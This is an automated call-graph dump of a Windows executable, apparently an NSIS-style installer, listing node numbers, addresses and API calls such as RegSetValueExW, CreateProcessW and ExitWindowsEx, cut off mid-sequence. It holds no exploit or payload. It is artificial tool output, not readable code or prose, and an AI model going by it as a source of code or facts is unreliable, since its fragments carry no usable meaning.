CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 